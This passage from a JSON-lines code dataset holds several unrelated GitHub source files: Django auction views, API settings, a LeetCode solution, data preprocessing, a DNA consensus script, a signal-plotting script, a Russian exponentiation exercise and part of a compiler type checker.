False)\n try:\n listing = Listing.objects.create(person=person ,title=title, description=description, price=price, image=image, closed=False, category=category)\n listing.save()\n except ValidationError:\n return render(request, \"auctions/index.html\", {\n \"bad_message\": \"Invalid value(s)\"\n })\n return render(request, \"auctions/index.html\", {\n \"good_message\": \"Listing 
created successfully.\",\n \"listings\": Listing.objects.all().filter(closed=False),\n \"watchlistCount\": Watchlist.objects.filter(person=person).count()\n })\n return render(request, \"auctions/create.html\", {\n \"watchlistCount\": Watchlist.objects.filter(person=person).count()\n })\n\n\ndef show_listing(request, listing_id):\n listing = Listing.objects.get(pk=listing_id)\n bidCount = Bid.objects.all().filter(item=listing).count()\n commentCount = Comment.objects.all().filter(refItem=listing).count()\n comments = Comment.objects.all().filter(refItem=listing)\n\n # Get highest bid if it exists, set to None otherwise\n try:\n highestBid = Bid.objects.all().filter(item=listing).order_by('-amount').first().amount\n except:\n highestBid = None\n try:\n currentUser = request.user.id\n person = User.objects.get(id=currentUser)\n try:\n userBid = Bid.objects.all().filter(person=person, item=listing).order_by('-amount').first().amount\n except:\n userBid = None\n if request.method == 'POST':\n\n # If a comment is posted update\n if 'placeComment' in request.POST:\n text = request.POST[\"comment\"]\n comment = Comment.objects.create(refItem=listing, name=person, text=text)\n comment.save()\n return render(request, \"auctions/index.html\", {\n \"neutral_message\": \"Comment placed.\",\n \"watchlistCount\": Watchlist.objects.filter(person=person).count(),\n \"listings\": Listing.objects.all().filter(closed=False)\n })\n \n # Check if forms was submitted from user that made the listing, then the request is for closing the auction\n if person == listing.person:\n listing.closed = True\n listing.save(update_fields=['closed'])\n return render(request, \"auctions/index.html\", {\n \"good_message\": \"Auction closed successfully.\",\n \"watchlistCount\": Watchlist.objects.filter(person=person).count(),\n \"listings\": Listing.objects.all().filter(closed=False)\n })\n \n # Otherwise, it is for making a bid\n bidAmount = request.POST[\"bid\"]\n bid = 
Bid.objects.create(person=person, item=listing, amount=bidAmount)\n bid.save()\n return render(request, \"auctions/index.html\", {\n \"good_message\": \"Bid placed successfully.\",\n \"watchlistCount\": Watchlist.objects.filter(person=person).count(),\n \"listings\": Listing.objects.all().filter(closed=False)\n })\n \n # If no POST request is made simply display the listing, check if listing already in watchlist\n try:\n watchedItem = Watchlist.objects.get(person=person, item=listing)\n return render(request, \"auctions/listing.html\", {\n \"listing\": listing,\n \"bidCount\": bidCount,\n \"highestBid\": highestBid,\n \"userBid\": userBid,\n \"onWatchlist\": watchedItem,\n \"watchlistCount\": Watchlist.objects.filter(person=person).count(),\n \"commentCount\": commentCount,\n \"comments\": comments\n })\n except Watchlist.DoesNotExist:\n return render(request, \"auctions/listing.html\", {\n \"listing\": listing,\n \"bidCount\": bidCount,\n \"highestBid\": highestBid,\n \"userBid\":userBid,\n \"watchlistCount\": Watchlist.objects.filter(person=person).count(),\n \"commentCount\": commentCount,\n \"comments\": comments\n })\n \n # If user is not logged in\n except User.DoesNotExist:\n return render(request, \"auctions/listing.html\", {\n \"listing\": listing,\n \"highestBid\": highestBid,\n \"commentCount\": commentCount,\n \"comments\": comments\n })\n\n\n@login_required\ndef show_watchlist(request):\n currentUser = request.user.id\n person = User.objects.get(id=currentUser)\n if request.method == 'POST':\n\n # Get item from Listing models\n listing = request.POST[\"item\"]\n item = Listing.objects.get(id=listing)\n\n # Try removing object from watchlist, add to watchlist if it doesn't exist\n try:\n watchedItem = Watchlist.objects.get(person=person, item=item)\n watchlist = Watchlist.objects.filter(person=person, item=item).delete()\n return render(request, \"auctions/watchlist.html\", {\n \"watchlist\": Watchlist.objects.all().filter(person=person),\n 
\"good_message\": \"Removed from Watchlist.\"\n })\n except Watchlist.DoesNotExist:\n watchlist = Watchlist.objects.create(person=person, item=item)\n watchlist.save()\n return render(request, \"auctions/watchlist.html\", {\n \"watchlist\": Watchlist.objects.all().filter(person=person),\n \"good_message\": \"Added to Watchlist.\"\n })\n return render(request, \"auctions/watchlist.html\", {\n \"watchlist\": Watchlist.objects.all().filter(person=person)\n })\n\n\ndef show_categories(request):\n categories = ['Home', 'Electronics', 'Clothing', 'Sports', 'Motors']\n\n # Category is selected \n if request.method == 'POST':\n selectedCategory = request.POST[\"category\"]\n categorizedListings = Listing.objects.all().filter(closed=False, category=selectedCategory)\n try:\n currentUser = request.user.id\n person = User.objects.get(id=currentUser)\n return render(request, \"auctions/categories.html\", {\n \"selectedCategory\": selectedCategory,\n \"categories\": categories,\n \"listings\": categorizedListings,\n \"watchlistCount\": Watchlist.objects.filter(person=person).count()\n })\n except User.DoesNotExist:\n return render(request, \"auctions/categories.html\", {\n \"selectedCategory\": selectedCategory,\n \"categories\": categories,\n \"listings\": categorizedListings\n })\n\n # No category selected\n try:\n currentUser = request.user.id\n person = User.objects.get(id=currentUser)\n return render(request, \"auctions/categories.html\", {\n \"categories\": categories,\n \"listings\": Listing.objects.all().filter(closed=False),\n \"watchlistCount\": Watchlist.objects.filter(person=person).count()\n })\n except User.DoesNotExist:\n return render(request, \"auctions/categories.html\", {\n \"categories\": categories,\n \"listings\": Listing.objects.all().filter(closed=False)\n 
})\n","repo_name":"konpapp/HarvardX","sub_path":"commerce/auctions/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"6230185607","text":"import os\n\nQUERYENGINE_API_ROOT = \"http://{host}:{port}/v3/queryengine\".format(\n host=os.environ[\"QUERYENGINE_API_HOST\"], port=os.environ[\"QUERYENGINE_API_PORT\"]\n)\n\nAUTH_API_ROOT = \"http://{host}:{port}/v3/auth\".format(\n host=os.environ[\"AUTH_API_HOST\"], port=os.environ[\"AUTH_API_PORT\"]\n)\n\nMETA_API_ROOT = \"http://{host}:{port}/v3/meta\".format(\n host=os.environ[\"META_API_HOST\"], port=os.environ[\"META_API_PORT\"]\n)\n\nDATALAB_API_ROOT = \"http://{host}:{port}/v3/datalab\".format(\n host=os.environ[\"DATALAB_API_HOST\"], port=os.environ[\"DATALAB_API_PORT\"]\n)\n\nDATAFLOW_API_ROOT = \"http://{host}:{port}/v3/dataflow\".format(\n host=os.environ[\"DATAFLOW_API_HOST\"], port=os.environ[\"DATAFLOW_API_PORT\"]\n)\n\nDATAHUB_API_ROOT = \"http://{host}:{port}/v3\".format(\n host=os.environ[\"DATAHUB_API_HOST\"], port=os.environ[\"DATAHUB_API_PORT\"]\n)\n\nJUPYTERHUB_USER = os.environ[\"JUPYTERHUB_USER\"]\n","repo_name":"Tencent/bk-base","sub_path":"src/datalab/notebook/notebook-command/command/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":85,"dataset":"github-code","pt":"18"} +{"seq_id":"36656918105","text":"\"\"\"day2_jewels_and_stones.py\n Created by Aaron at 02-May-20\"\"\"\nclass Solution:\n def numJewelsInStones(self, J: str, S: str) -> int:\n # app1\n # dic={x for x in J}\n # ans=0\n # for x in S:\n # if x in dic:\n # ans+=1\n # return ans\n\n # app2\n dic = {x for x in J}\n return sum(x in dic for x in S)\n \n # app3\n # return sum(map(J.count, S))\n\nrun=Solution()\na,b=\"aA\",\"aAAbbbb\"\nprint(run.numJewelsInStones(a,b))\n# app1 J in dictionary and traverse S and check the 
dictonary, time O(m+n) space O(m)/O(n)\n# app2 similar to app1 but using sum, time O(m+n) space O(m)/O(n)\n# app3 check frequently, time O(mn) space O(1)","repo_name":"aaron6347/leetcode_May30Days","sub_path":"venv/day2_jewels_and_stones.py","file_name":"day2_jewels_and_stones.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"33025455764","text":"import pandas as pd\nimport numpy as np\nfrom fraud_detector.utils import get_abs_path\nfrom sklearn.model_selection import train_test_split\nfrom typing import Tuple\n\n\ndef load_data(file_path: str = \"data/dataset_TakeHome.csv\") -> pd.DataFrame:\n \"\"\"Loads data from a csv file.\n\n Args:\n file_path (str): The name of the file to load. Should either be absolute or relative to the base repo.\n\n Returns:\n pd.DataFrame: dataset as dataframe\n \"\"\"\n return pd.read_csv(get_abs_path(file_path))\n\n\ndef preprocess_data(\n df: pd.DataFrame, target_var: str = \"Outcome\"\n) -> Tuple[np.ndarray, np.ndarray, np.ndarray, np.ndarray]:\n \"\"\"Preprocesses the dataframe by removing unnecessary columns and rows.\n\n Args:\n df (pd.DataFrame): The dataframe to clean.\n\n Returns:\n Tuple[np.ndarray]: X_train, X_test, y_train, y_tes\n \"\"\"\n df = _clean_data(df)\n df = _feature_selection(df)\n # X_train, X_test, y_train, y_test\n return train_test_split(\n df.drop(columns=[target_var]), df[target_var], test_size=0.2, random_state=42\n )\n\n\ndef _clean_data(df: pd.DataFrame) -> pd.DataFrame:\n \"\"\"Cleans the dataframe by removing unnecessary columns and rows.\n\n Args:\n df (pd.DataFrame): The dataframe to clean.\n\n Returns:\n pd.DataFrame: cleaned dataframe\n \"\"\"\n df.drop_duplicates(inplace=True)\n df.dropna(inplace=True)\n return df\n\n\ndef _feature_selection(df: pd.DataFrame, corr_threshold: float = 0.7) -> pd.DataFrame:\n \"\"\"Selects the features to use in the model.\n\n Args:\n df (pd.DataFrame): The 
dataframe to clean.\n\n Returns:\n pd.DataFrame: cleaned dataframe\n \"\"\"\n corr_matrix = df.corr().abs()\n upper_tri = corr_matrix.where(\n np.triu(np.ones(corr_matrix.shape), k=1).astype(np.bool)\n )\n cols_to_drop = [\n column\n for column in upper_tri.columns\n if any(upper_tri[column] > corr_threshold)\n ]\n print(f\"Dropping {len(cols_to_drop)} columns: {cols_to_drop}\")\n df = df.drop(columns=cols_to_drop)\n return df\n","repo_name":"suryaavala/finder_test","sub_path":"fraud_detector/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"31530335098","text":"# IMPORT\nfrom Bio import SeqIO\n\n\n# FUNCTION\n\ndef profile_ADN(input_file):\n\n fasta_sequences = list(SeqIO.parse(open(input_file),'fasta'))\n len_seq = len(fasta_sequences[0].seq) # hyp. all seq have same len in the fasta file\n # print(f\"len seq : {len_seq}\")\n dict_profile = {\"A\": [0]*len_seq ,\n \"C\": [0]*len_seq,\n \"G\": [0]*len_seq,\n \"T\": [0]*len_seq}\n # print(dict_profile)\n\n for fasta in fasta_sequences:\n sequence = list(fasta.seq)\n for index, nucleotide in enumerate(sequence):\n for key in dict_profile:\n dict_profile[key][index] += int(key == nucleotide)\n\n return dict_profile, len_seq\n\n\ndef consensus(dict_profile, len_seq):\n consensus_list = []\n list_keys = list(dict_profile.keys())\n for index in range(len_seq):\n max_value = 0\n for key in list_keys:\n str = key\n value = dict_profile[str][index]\n if value >= max_value: # '=' not necessary, it's a choice\n str_max = key\n max_value = value\n\n consensus_list.append(str_max)\n\n print( ''.join(consensus_list))\n\n\n\n\n# PARAMETERS\ninput_file = \"16_equal_len.fasta\"\n\n# PROGRAM\ndict_profile, len_seq = profile_ADN(input_file)\n\nconsensus(dict_profile, len_seq)\nfor key, value in dict_profile.items():\n print(f\"{key}: \", end = \"\") \n for num in value:\n print(f\"{num} \", end = 
\"\")\n print(\"\")\n ","repo_name":"PaulineTurk/ROSALIND","sub_path":"16_Consensus_and_Profile.py","file_name":"16_Consensus_and_Profile.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"547644096","text":"##Generar señales con Python para el ciclo de publicaciones sobre procesamiento digital de señales PDS \n#Importanto las librerías necesarias\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n#Creando un array de mil valores con numpy, de t=0 a t=0.5\nt = np.linspace(0,0.5,1000)\n\n#Generando tres funciones seno, con amplitud unitaria\nsenal_50Hz = np.sin(2*np.pi*50*t) #frecuencia = 50Hz\nsenal_200Hz = np.sin(2*np.pi*200*t) #frecuencia = 200Hz\nsenal_50Hz_500Hz = senal_50Hz + senal_500Hz #suma de señales\n\n# Gráficando tres subplots.\nf, plotArray = plt.subplots(3, sharex=True)\nf.suptitle(\"Señales de ejemplo\")\nplotArray[0].plot(senal_50Hz, color = 'red')\nplotArray[1].plot(senal_200Hz, color = 'green')\nplotArray[2].plot(senal_50Hz_200Hz, color = 'blue')\n","repo_name":"SiderealOcean/PDS","sub_path":"generarSenal.py","file_name":"generarSenal.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"18562264645","text":"\"\"\"4. Программа принимает действительное положительное число x и целое отрицательное число\r\ny . Выполните возведение числа x в степень y . Задание реализуйте в виде функции\r\nmy_func(x, y) . При решении задания нужно обойтись без встроенной функции возведения\r\nчисла в степень.\r\nПодсказка: попробуйте решить задачу двумя способами. Первый — возведение в степень с\r\nпомощью оператора **. 
Второй — более сложная реализация без оператора **,\r\nпредусматривающая использование цикла.\"\"\"\r\n\r\n\"\"\"Решение по первому варианту\"\"\"\r\n\r\n\r\ndef degree_number_variant1(x, y):\r\n print(f\"Вариант 1: {x ** y}\")\r\n\r\n\r\ndef degree_number_variant2(x, y):\r\n \"\"\"для целых чисел X в степени минус Y это 1/X**Y=> 4**(-2) =>1/4**2 =>1/16\"\"\"\r\n s = 1\r\n for i in range(abs(y)):\r\n s *= 1 / x\r\n print(f\"Вариант 2: {s}\")\r\n\r\n\r\ninput_x = abs(float(input(\"Введите число Х в виде действительного положительного числа:\")))\r\ninput_y = int(input(\"Введите степень Y в виде целого отрицательного числа:\"))\r\nif input_y < 0:\r\n degree_number_variant1(input_x, input_y)\r\n degree_number_variant2(input_x, input_y)\r\nelse:\r\n print(\"Неверно введено значение Y!\")\r\n","repo_name":"andyleva/kurs-python","sub_path":"lesson03-hw04.py","file_name":"lesson03-hw04.py","file_ext":"py","file_size_in_byte":1698,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"28500120039","text":"from typing import List, Dict, Union, Iterable\r\n\r\nfrom parsing.op import *\r\nfrom state import *\r\nfrom .types import type_to_str\r\nfrom .types import *\r\n\r\nassert len(Operator) == 20, \"Unimplemented operator in type_checking.py\"\r\nassert len(OpType) == 40, \"Unimplemented type in type_checking.py\"\r\nassert len(BlockType) == 6, \"Unimplemented block type in type_checking.py\"\r\n\r\n\r\ndef check_stack(stack: List[Type], expected: List[Type], arg=0):\r\n assert len(stack) >= len(expected), \"stack is too short\"\r\n for i in range(len(expected)):\r\n got = stack.pop()\r\n exp = expected.pop()\r\n if got != exp and exp is not None and got is not None:\r\n State.throw_error(f\"unexpected argument type\", False)\r\n sys.stderr.write(\r\n f\"\\033[1;34mArgument {i+1+arg}\\033[0m: {type_to_str(got)} instead of {type_to_str(exp)}\\n\"\r\n )\r\n exit(1)\r\n\r\n\r\ndef check_route_stack(\r\n stack1: 
List[Type], stack2: List[Type], error: str = \"in different routes of if-end\"\r\n):\r\n if len(stack1) > len(stack2):\r\n State.throw_error(f\"stack has extra elements {error}\", False)\r\n sys.stderr.write(\r\n f\"\\033[1;34mTypes\\033[0m: {', '.join(type_to_str(i) for i in stack1[len(stack2)-len(stack1):])}\\n\"\r\n )\r\n exit(1)\r\n if len(stack1) < len(stack2):\r\n State.throw_error(f\"stack has not enought elements {error}\", False)\r\n sys.stderr.write(\r\n f\"\\033[1;34mTypes\\033[0m: {', '.join(type_to_str(i) for i in stack2[len(stack1)-len(stack2):])}\\n\"\r\n )\r\n exit(1)\r\n for i in range(len(stack1)):\r\n if (\r\n not check_varient(stack1[i], stack2[i]) and\\\r\n stack1[i] is not None and stack2[i] is not None\r\n ):\r\n State.throw_error(f\"different types {error}\", False)\r\n sys.stderr.write(\r\n f\"\\033[1;34mElement {len(stack1)-i}\\033[0m: {type_to_str(stack1[i])} instead of {type_to_str(stack2[i])}\\n\"\r\n )\r\n exit(1)\r\n\r\n stack1[i] = down_cast(stack1[i], stack2[i])\r\n\r\n\r\ndef type_check(ops: List[Op], is_main: bool = False):\r\n stack: list = []\r\n\r\n if is_main and State.config.struct_malloc[1]:\r\n State.loc = \"\"\r\n if \"malloc\" not in State.procs:\r\n assert not State.config.struct_malloc[0],\\\r\n \"Malloc procedure not found while struct_malloc is enabled\"\r\n State.config.config[\"struct_malloc\"] = False\r\n else:\r\n proc = State.procs[\"malloc\"]\r\n if proc.in_stack != [Int()]:\r\n assert not State.config.struct_malloc[0],\\\r\n \"Malloc must take one integer, disable struct_malloc if you don't want the compiler to use malloc\"\r\n State.config.config[\"struct_malloc\"] = False\r\n if proc.out_stack != [Ptr()]:\r\n assert not State.config.struct_malloc[0],\\\r\n \"Malloc must return one pointer, disable struct_malloc if you don't want the compiler to use malloc\"\r\n State.config.config[\"struct_malloc\"] = False\r\n if State.config.struct_malloc[1]:\r\n State.add_proc_use(proc)\r\n\r\n if is_main and 
len(State.runtimed_types_list):\r\n State.loc = \"\"\r\n for struct in State.TYPE_STRUCTS:\r\n assert struct in State.structures,\\\r\n f\"If types in runtime are used type.cn must be included from std. Structure {struct} not found.\"\r\n\r\n index = 0\r\n while index < len(ops):\r\n op = ops[index]\r\n new_op = type_check_op(op, stack)\r\n if isinstance(new_op, Iterable):\r\n ops[index : index + 1] = new_op\r\n index += len(new_op) - 1\r\n elif new_op is not None:\r\n ops[index] = new_op\r\n\r\n index += 1\r\n\r\n if is_main:\r\n ops.extend([Op(OpType.OPERATOR, Operator.DROP) \r\n for _ in range(len(stack))])\r\n\r\n return stack\r\n\r\n\r\ndef process_for_in(op: Op, stack: List[Type], iter_stack: list) -> list:\r\n type_ = iter_stack[0]\r\n check_stack(iter_stack, [Ptr(Array())])\r\n type_ = type_.typ\r\n State.ops_by_ips[op.operand[0].end].operand = (*op.operand[:2], type_)\r\n if type_.len == 0:\r\n return []\r\n State.route_stack.append((\"for\", stack.copy()))\r\n State.bind_stack.extend((Int(), type_.typ))\r\n if State.config.re_IOR:\r\n State.locs_to_include.append(op.loc)\r\n op.operand[0].type = BlockType.WHILE\r\n return [\r\n Op(OpType.PUSH_INT, 0, loc=op.loc),\r\n Op(OpType.PUSH_INT, 1, loc=op.loc),\r\n Op(OpType.WHILE, op.operand[0], loc=op.loc), # TODO:\r\n Op(OpType.OPERATOR, Operator.DUP, loc=op.loc),\r\n *op.operand[2],\r\n Op(\r\n OpType.INDEX,\r\n (sizeof(type_.typ), type_.len),\r\n loc_id=len(State.locs_to_include) - 1,\r\n loc=op.loc,\r\n ),\r\n Op(OpType.BIND, 2, loc=op.loc),\r\n ]\r\n\r\n\r\ndef process_for_until(op: Op, stack: List[Type], iter_stack: list) -> list:\r\n check_stack(iter_stack, [Ptr()])\r\n State.route_stack.append((\"for\", stack.copy()))\r\n State.bind_stack.extend((Ptr(), Int()))\r\n op.operand[0].type = BlockType.WHILE\r\n\r\n if State.config.re_NPD:\r\n State.locs_to_include.append(op.loc)\r\n\r\n return [\r\n *op.operand[2],\r\n Op(OpType.OPERATOR, Operator.DUP, loc=op.loc),\r\n Op(\r\n OpType.OPERATOR,\r\n 
Operator.LOAD8,\r\n loc=op.loc,\r\n loc_id=len(State.locs_to_include) - 1,\r\n ),\r\n Op(OpType.OPERATOR, Operator.DUP, loc=op.loc),\r\n Op(OpType.PUSH_INT, 0, loc=op.loc),\r\n Op(OpType.OPERATOR, Operator.NE, loc=op.loc),\r\n Op(OpType.WHILE, op.operand[0], loc=op.loc),\r\n Op(OpType.BIND, 2, loc=op.loc),\r\n ]\r\n\r\n\r\ndef match_type_var(typ: Optional[Type], actual: Optional[Type]) -> Dict[int, Type]:\r\n if typ is None or actual is None:\r\n return {}\r\n if isinstance(typ, VarType):\r\n return {id(typ): actual}\r\n if isinstance(typ, Ptr) and isinstance(actual, Ptr):\r\n return match_type_var(typ.typ, actual.typ)\r\n if isinstance(typ, Array) and isinstance(actual, Array):\r\n return match_type_var(typ.typ, actual.typ)\r\n return {}\r\n\r\n\r\ndef get_var_type_values(types: List[Type], stack: List[Type]) -> Dict[int, Type]:\r\n var_types: Dict[int, Type] = {}\r\n assert len(stack) >= len(types), \"Not enough elements on the stack\"\r\n for typ, actual in zip(types, stack):\r\n var_types = {**match_type_var(typ, actual), **var_types}\r\n return var_types\r\n\r\n\r\ndef get_concrete_type(typ: Type, var_types: Dict[int, Type]) -> Type:\r\n if isinstance(typ, VarType):\r\n assert id(typ) in var_types, f'Cannot obtain value for type varaible \"{typ.name}\"'\r\n return var_types[id(typ)]\r\n if isinstance(typ, Ptr):\r\n return Ptr(get_concrete_type(typ.typ, var_types))\r\n if isinstance(typ, Array):\r\n return Array(typ.len, get_concrete_type(typ.typ, var_types))\r\n return typ\r\n\r\n\r\ndef process_call(op: Op, stack: List[Type]) -> None:\r\n in_types: List[object] = []\r\n out_types: List[object] = []\r\n var_types = get_var_type_values(\r\n op.operand.in_stack, stack[-len(op.operand.in_stack):]\r\n )\r\n for typ in op.operand.in_stack:\r\n in_types.append(get_concrete_type(typ, var_types))\r\n for typ in op.operand.out_stack:\r\n out_types.append(get_concrete_type(typ, var_types))\r\n check_stack(stack, in_types)\r\n stack.extend(out_types)\r\n\r\n\r\ndef 
type_check_op(op: Op, stack: List[Type]) -> Optional[Union[Op, List[Op]]]:\r\n cont_assert(len(OpType) == 40, \"Unimplemented type in type_check_op\")\r\n\r\n State.loc = op.loc\r\n\r\n if not op.compiled:\r\n return None\r\n\r\n if op.type == OpType.PUSH_INT:\r\n stack.append(Int())\r\n elif op.type in (OpType.PUSH_MEMORY, OpType.PUSH_LOCAL_MEM):\r\n stack.append(Ptr())\r\n elif op.type == OpType.PUSH_VAR:\r\n if must_ptr(State.variables[op.operand]):\r\n stack.append(Ptr(State.variables[op.operand]))\r\n return Op(OpType.PUSH_VAR_PTR, op.operand, loc=op.loc)\r\n else:\r\n stack.append(State.variables[op.operand])\r\n elif op.type == OpType.PUSH_VAR_PTR:\r\n assert not must_ptr(State.variables[op.operand]),\\\r\n \"variable is automatically a pointer, cannot push a pointer excplicitly\"\r\n stack.append(Ptr(State.variables[op.operand]))\r\n elif op.type == OpType.PUSH_LOCAL_VAR:\r\n cont_assert(State.current_proc is not None,\r\n \"Probably bug in parsing with local and global variables\")\r\n if must_ptr(State.current_proc.variables[op.operand]):\r\n stack.append(Ptr(State.current_proc.variables[op.operand]))\r\n return Op(OpType.PUSH_LOCAL_VAR_PTR, op.operand, loc=op.loc)\r\n else:\r\n stack.append(State.current_proc.variables[op.operand])\r\n elif op.type == OpType.PUSH_LOCAL_VAR_PTR:\r\n cont_assert(State.current_proc is not None,\r\n \"Probably bug in parsing with local and global variables\")\r\n assert not must_ptr(State.current_proc.variables[op.operand]),\\\r\n \"variable is automatically a pointer, cannot push a pointer excplicitly\"\r\n\r\n stack.append(Ptr(State.current_proc.variables[op.operand]))\r\n elif op.type == OpType.PUSH_STR:\r\n stack.append(Int())\r\n stack.append(Ptr())\r\n elif op.type == OpType.PUSH_NULL_STR:\r\n stack.append(Ptr())\r\n elif op.type == OpType.PUSH_PROC:\r\n stack.append(Addr(op.operand.in_stack, op.operand.out_stack))\r\n elif op.type == OpType.CAST:\r\n check_stack(stack, [None])\r\n stack.append(op.operand)\r\n elif 
op.type == OpType.UPCAST:\r\n assert len(stack) >= 1, \"stack is too short\"\r\n struct = stack[-1]\r\n check_stack(stack, [Ptr()])\r\n assert isinstance(struct.typ, Struct), \"can't upcast non-struct\"\r\n\r\n struct = struct.typ\r\n assert op.operand == struct,\\\r\n f\"can't upcast {type_to_str(struct)} to {type_to_str(op.operand)}\"\r\n\r\n check_stack(stack, op.operand.fields_types[len(struct.fields_types) :])\r\n\r\n stack.append(Ptr(op.operand))\r\n\r\n return Op(\r\n OpType.UPCAST,\r\n (\r\n sizeof(op.operand),\r\n len(op.operand.fields_types) - len(struct.fields_types),\r\n sizeof(struct),\r\n ),\r\n op.loc,\r\n )\r\n elif op.type == OpType.IF:\r\n check_stack(stack, [Int()])\r\n State.route_stack.append((\"if-end\", stack.copy()))\r\n elif op.type == OpType.ELSE:\r\n original_stack = State.route_stack.pop()[1]\r\n op.operand.stack_effect = (len(original_stack), len(stack))\r\n State.route_stack.append((\"if-else\", stack.copy()))\r\n stack.clear()\r\n stack.extend(original_stack)\r\n elif op.type == OpType.ENDIF:\r\n route_stack = State.route_stack.pop()\r\n if route_stack[0] == \"if-end\":\r\n op.operand.stack_effect = (len(stack), len(stack))\r\n check_route_stack(stack, route_stack[1])\r\n else:\r\n check_route_stack(stack, route_stack[1], \"in different routes of if-else\")\r\n elif op.type == OpType.WHILE:\r\n check_stack(stack, [Int()])\r\n State.route_stack.append((\"while\", stack.copy()))\r\n elif op.type == OpType.ENDWHILE:\r\n check_stack(stack, [Int()])\r\n pre_while_stack = State.route_stack.pop()[1]\r\n op.operand.stack_effect = (len(pre_while_stack), len(stack))\r\n check_route_stack(stack, pre_while_stack, \"in different routes of while\")\r\n elif op.type == OpType.FOR:\r\n iter_stack = type_check(op.operand[2])\r\n assert len(iter_stack) == 1, \"iterable expression should return one value\"\r\n if op.operand[1] == \"in\":\r\n return process_for_in(op, stack, iter_stack)\r\n elif op.operand[1] == \"until\":\r\n return 
process_for_until(op, stack, iter_stack)\r\n else:\r\n cont_assert(False, \"Unimplemented for type in type checking\")\r\n elif op.type == OpType.ENDFOR:\r\n State.bind_stack.pop()\r\n State.bind_stack.pop()\r\n if op.operand[1] == \"in\":\r\n if op.operand[2].len == 0:\r\n return []\r\n pre_for_stack = State.route_stack.pop()[1]\r\n check_route_stack(stack, pre_for_stack, \"in different routes of for\")\r\n end_while = Op(OpType.ENDWHILE, op.operand[0], loc=op.loc)\r\n State.ops_by_ips[op.operand[0].end] = end_while\r\n return [\r\n Op(OpType.PUSH_BIND_STACK, len(State.bind_stack), loc=op.loc),\r\n Op(OpType.PUSH_INT, 1, loc=op.loc),\r\n Op(OpType.OPERATOR, Operator.ADD, loc=op.loc),\r\n Op(OpType.OPERATOR, Operator.DUP, loc=op.loc),\r\n Op(OpType.PUSH_INT, op.operand[2].len, loc=op.loc),\r\n Op(OpType.OPERATOR, Operator.LT, loc=op.loc),\r\n Op(OpType.UNBIND, 2, loc=op.loc),\r\n end_while,\r\n Op(OpType.OPERATOR, Operator.DROP, loc=op.loc),\r\n ]\r\n elif op.operand[1] == \"until\":\r\n pre_for_stack = State.route_stack.pop()[1]\r\n check_route_stack(stack, pre_for_stack, \"in different routes of for\")\r\n\r\n if State.config.re_NPD:\r\n State.locs_to_include.append(op.loc)\r\n end_while = Op(OpType.ENDWHILE, op.operand[0], loc=op.loc)\r\n State.ops_by_ips[op.operand[0].end] = end_while\r\n return [\r\n Op(OpType.PUSH_BIND_STACK, len(State.bind_stack), loc=op.loc),\r\n Op(OpType.PUSH_INT, 1, loc=op.loc),\r\n Op(OpType.OPERATOR, Operator.ADD, loc=op.loc),\r\n Op(OpType.OPERATOR, Operator.DUP, loc=op.loc),\r\n Op(\r\n OpType.OPERATOR,\r\n Operator.LOAD8,\r\n loc=op.loc,\r\n loc_id=len(State.locs_to_include) - 1,\r\n ),\r\n Op(OpType.OPERATOR, Operator.DUP, loc=op.loc),\r\n Op(OpType.PUSH_INT, 0, loc=op.loc),\r\n Op(OpType.OPERATOR, Operator.NE, loc=op.loc),\r\n Op(OpType.UNBIND, 2, loc=op.loc),\r\n end_while,\r\n ]\r\n elif op.type == OpType.BIND:\r\n assert len(stack) >= op.operand, \"stack is too short for bind\"\r\n 
State.bind_stack.extend(stack[-op.operand:])\r\n stack[-op.operand:] = []\r\n elif op.type == OpType.UNBIND:\r\n for _ in range(op.operand):\r\n State.bind_stack.pop()\r\n elif op.type == OpType.PUSH_BIND_STACK:\r\n typ = State.bind_stack[op.operand[0]]\r\n if op.operand[1] == \"base\":\r\n assert typ == Ptr(), \"Binded value self must be a pointer to use base\"\r\n assert isinstance(typ.typ, Struct), \"Binded value self must be a pointer to a structure to use base\"\r\n assert typ.typ.parent is not None, f'Structure \"{typ.typ.name}\" does not have a parent'\r\n\r\n stack.append(Ptr(typ.typ.parent))\r\n else:\r\n stack.append(State.bind_stack[op.operand[0]])\r\n return Op(OpType.PUSH_BIND_STACK, op.operand[0], loc=op.loc, loc_id=op.loc_id)\r\n elif op.type == OpType.DEFPROC:\r\n State.route_stack.append((\"proc\", stack.copy()))\r\n stack.clear()\r\n stack.extend(op.operand.in_stack)\r\n State.current_proc = op.operand\r\n elif op.type == OpType.ENDPROC:\r\n check_route_stack(\r\n stack,\r\n State.get_proc_by_block(op.operand).out_stack,\r\n \"in procedure definition\",\r\n )\r\n stack.clear()\r\n stack.extend(State.route_stack.pop()[1])\r\n State.current_proc = None\r\n elif op.type == OpType.CALL:\r\n process_call(op, stack)\r\n elif op.type == OpType.TYPED_LOAD:\r\n check_stack(stack, [Ptr(op.operand)])\r\n stack.append(op.operand)\r\n elif op.type == OpType.PACK:\r\n struct = State.structures[op.operand[0]]\r\n if not op.operand[1]:\r\n cont_assert(stack.pop().typ == struct, \"Probably a user now has more control over PACK (_, False)\")\r\n if \"__init__\" in struct.methods:\r\n args = struct.methods[\"__init__\"].in_stack.copy()[:-1]\r\n State.add_proc_use(struct.methods[\"__init__\"])\r\n else:\r\n args = struct.fields_types.copy()\r\n for i, j in enumerate(struct.defaults):\r\n del args[j - i]\r\n check_stack(stack, args)\r\n stack.append(Ptr(struct))\r\n elif op.type == OpType.PUSH_FIELD:\r\n assert len(stack) >= 1, \"stack is too short\"\r\n ptr = 
